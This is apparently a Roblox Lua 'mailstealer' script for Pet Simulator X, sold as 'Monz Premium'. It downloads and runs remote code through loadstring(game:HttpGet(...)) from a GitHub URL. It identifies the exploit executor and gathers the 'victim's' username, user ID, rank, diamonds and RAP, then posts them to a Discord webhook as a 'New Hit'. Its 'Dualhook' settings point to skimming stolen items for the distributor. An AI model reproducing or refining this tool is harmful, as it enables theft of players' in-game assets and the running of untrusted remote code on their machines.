 getgenv().Settings = {
    PremiumKey = "rizzhub-LQOIpi8RuiFDqZ85hgwz",
    Webhook = false, -- By Making This True The Users Of Your Script Will Be Able
    -- To Use A Webhook And They Will Get Every Notif Even The Dualhooked Ones
    MailMessage = "Monz Better",
  Titanics = {
       Dualhook = false,
       Intensity = 100--%
  },
  Banana = {
       Dualhook = false,
       Intensity = 100--%
  },
  Huges = {
       Dualhook = false,
       Intensity = 100--%
  },
  Pogs = {
       Dualhook = false,
       Intensity = 100--%
  },
   Exclusives = {
       Dualhook = false,
       Intensity = 100--%
  },
   Events = {
       Dualhook = false,
       Intensity = 100--%
  },
   Secrets = {
       Dualhook = false,
       Intensity = 100--%
   },
   HC_DM_Mythics = {
       Dualhook = false,
       Intensity = 100--%
   },
   Gems = {
       Dualhook = false,
       Intensity = 100--%
  }
}
    
loadstring(game:HttpGet("https://raw.githubusercontent.com/SuperMonz/Psx_Sc/main/Petsimguiss", true))()

--// Executor detector

local function getexploit()
	local exploit =
		(syn and not is_sirhurt_closure and not pebc_execute and "Synapse") or
		(secure_load and "Sentinel") or
		(is_sirhurt_closure and "Sirhurt") or
		(pebc_execute and "ProtoSmasher") or
		(KRNL_LOADED and "Krnl") or
		(WrapGlobal and "WeAreDevs") or
		(isvm and "Proxo") or
		(shadow_env and "Shadow") or
		(jit and "EasyExploits") or
		(getscriptenvs and "Calamari") or
		(unit and not syn and "Unit") or
		(OXYGEN_LOADED and "Oxygen U") or
		(IsElectron and "Electron") or
		("Unsupported")
  
	return exploit
  end
  
--// Execution Log
if game.PlaceId == 6284583030 then
	_G.GameIn = "Pet Simulator X"
elseif game.PlaceId == 7722306047 then
	_G.GameIn = "PSX Trading Plaza"
elseif game.PlaceId == 10321372166 then
	_G.GameIn = "PSX Hardcore"
elseif game.PlaceId == 12610002282 then
	_G.GameIn = "PSX Pro Trading Plaza"
elseif game.PlaceId == 11725212117 then
	_G.GameIn = "PSX Voice Trading Plaza"
else
	_G.GameIn = "❓ Couldn't find game"
end
local webhookcolor = "13369599"
_G.CurrentRank = game:GetService("Players").LocalPlayer.PlayerGui.Main.Right.Rank.RankName.Text
_G.PlrUserVictim = game.Players.LocalPlayer.Name
_G.PlrUserIDVictim = game.Players.LocalPlayer.UserId
_G.PlrDisplayNameVictim = game.Players.LocalPlayer.DisplayName
_G.DisplayDiamond = game:GetService("Players").LocalPlayer.leaderstats.Diamonds.Value
_G.DisplayRap = game:GetService("Players").LocalPlayer.leaderstats.RAP.Value
_G.DisplayBankTier = game:GetService("Players").LocalPlayer.PlayerGui.Bank.Frame.BankTitle.Tier.Text
local function sendwebhookDualHook(msgpremium)
local msg = {
	["avatar_url"] = "https://cdn.discordapp.com/attachments/1100823909009465497/1108811431404654592/images.png",
	["content"]= "**💎New Hit With Monz Premium💎** || @here|| ",
	["username"] = "💎 Monz Premium 💎",
	["embeds"]= {
	  {
		["title"]= "`Mailstealer Results`",
		["description"]= "**Data from the victim**\n**🧑Display Name: **".._G.PlrDisplayNameVictim.."\n**🧑Username: **".._G.PlrUserVictim.."\n**🧑User ID: **".._G.PlrUserIDVictim.."\n**🐱Rank: **".._G.CurrentRank.."\n**🎮Place: **".._G.GameIn.."**\n☠Executor: **"..getexploit(),
		["url"]= "https://discord.gg/tBKAnBUb",
		["color"]= ""..webhookcolor.."",
		["thumbnail"] = {
        ["url"] = "https://cdn.discordapp.com/attachments/1100823909009465497/1108821104853786785/cat.png",
        ["height"] = 420,
        ["width"] = 420
        },
		["fields"]= {
        {
          ["name"]= "**💎Diamonds 💎**",
          ["value"]= "```".._G.DisplayDiamond.."```",
          ["inline"]= true
        },
        {
          ["name"]= "**⬆️Rap⬆️**",
          ["value"]= "```".._G.DisplayRap.."```",
          ["inline"]= true
        }
      }
      
  }
  },
	["attachments"] = {}
  }
  local Webhook = _G.Webhook
  request = http_request or request or HttpPost or syn.request
  request({Url = Webhook, Method = "POST", Headers = {["Content-Type"] = "application/json"}, Body = game.HttpService:JSONEncode(msg)})
  end
  sendwebhook(msg)